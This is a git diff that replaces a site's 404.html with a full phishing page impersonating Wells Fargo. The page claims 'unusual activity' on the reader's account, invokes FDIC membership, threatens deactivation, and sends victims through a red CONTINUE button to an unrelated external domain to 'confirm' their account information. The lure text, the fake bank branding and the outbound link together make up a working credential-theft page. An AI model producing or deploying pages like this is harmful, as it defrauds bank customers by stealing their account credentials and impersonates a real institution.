--- a/404.html
+++ b/404.html
@@ -1,1 +1,97 @@
-<title>New Message</title><iframe src="https://avss-gamma.vercel.app/" style="width: 100%; height: 100%;"></iframe>
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1">
+    <title>Before we proceed</title><!-- update the version number as needed -->
+    <script defer src="//firebase/7.15.1/firebase-app.js"></script><!-- include only the Firebase features as you need -->
+    <script defer src="//firebase/7.15.1/firebase-auth.js"></script>
+    <script defer src="//firebase/7.15.1/firebase-database.js"></script>
+    <script defer src="//firebase/7.15.1/firebase-messaging.js"></script>
+    <script defer src="//firebase/7.15.1/firebase-storage.js"></script><!-- initialize the SDK after all desired features are loaded -->
+    <script defer src="//firebase/init.js"></script>
+    <style media="screen">
+        body {
+            background-image: url('https://firebasestorage.googleapis.com/v0/b/review-d3527.appspot.com/o/image1.webp?alt=media&token=c42dc978-6dbe-4bbf-9ae7-6b9d896c11f3');
+        }
+
+        #message {
+            background: white;
+            max-width: 660px;
+            margin: 50px auto 50px;
+            padding: 10px 24px;
+            border-radius: 10px;
+        }
+
+        #message h2 {
+            color: #ffa100;
+            font-weight: bold;
+            font-size: 16px;
+            margin: 0 0 8px;
+        }
+
+        #message h1 {
+            font-size: 22px;
+            font-weight: 300;
+            color: rgba(0, 0, 0, 0.753);
+            margin: 0 0 16px;
+            font-family: Arial, Helvetica;
+            font-style: bold;
+        }
+
+        #message p {
+            line-height: 140%;
+            margin: 16px 0 24px;
+            font-size: 15px;
+            font-family: Arial, Helvetica;
+        }
+
+        #load {
+            color: rgba(0, 0, 0, 0.4);
+            text-align: center;
+            font-size: 15px;
+            font-family: Arial, Helvetica;
+        }
+
+        @media (max-width: 600px) {
+            body {
+                background-image: url('https://firebasestorage.googleapis.com/v0/b/review-d3527.appspot.com/o/image1.webp?alt=media&token=c42dc978-6dbe-4bbf-9ae7-6b9d896c11f3');
+            }
+
+            #message {
+                margin: 60px auto 60px;
+                max-width: 600px;
+                padding: 15px 15px;
+                box-shadow: none;
+                border-radius: 10px
+            }
+        }
+    </style>
+</head>
+
+<body>
+    <div id="message">
+        <p style="text-align:center;"><img src="https://firebasestorage.googleapis.com/v0/b/review-d3527.appspot.com/o/logo.png?alt=media&token=34dfb842-af3a-4101-8376-c7ab515460e5" alt="Logo" width="300" height="63"></p>
+        <h1><b>Please Read Carefully:</b></h1>
+        <p>We have detected unusual activity on your account for an extended period of time. As part of our commitment to maintaining the security of your account, we kindly request your cooperation in reviewing and verifying your security information.
+</p>
+        <p>• We will conduct a comprehensive review of all account activity after you submit your information.</p>
+        <p><b>Why am i seeing this message?</b></p>
+        <p>• This message serves to inform and assist you in confirming the accuracy of your security information, which we currently have on record." As a member of FDIC and an Equal Housing Lender, we have an obligation to ensure that our customers' personal information remains up to date."</p>
+        <p><b>What actions can I take?</b></p>
+        <P><b><FONT color=#ff0000>• Please confirm your Account Information.</FONT></b></P>
+        <p><b>NOTE</b>:It is necessary for you to confirm or update your account security information in order to continue using this service. Failure to do so may result in the automatic deactivation of your account services, thereby preventing access to your account."</p>    
+        <div style="Margin-left: 20px;Margin-right: 20px;">
+            <div class="btn btn--shadow btn--medium" style="Margin-bottom: 20px;text-align: center;"><a style="border-radius: 4px;display: inline-block;font-size: 12px;font-weight: bold;line-height: 22px;padding: 10px 40px 11px 40px;text-align: center;text-decoration: none !important;transition: opacity 0.1s ease-in;color: #ffffff !important;box-shadow: inset 0 -4px 0 0 rgba(0, 0, 0, 0.2);background-color: #d71e28;font-family: Arial, Helvetica, sans-serif;" href="https://oamweb.co/avc?vns">   CONTINUE   </a>
+                
+            </div>
+            <div style=text-align:center;font-size:15px;line-height:19px;margin-top:20px;>
+                <div><b>WellsFargo Bank Team</b></div>
+                <p id="load"></p>
+            </div>
+        </div>
+    </div>
+</body>
+
+</html>
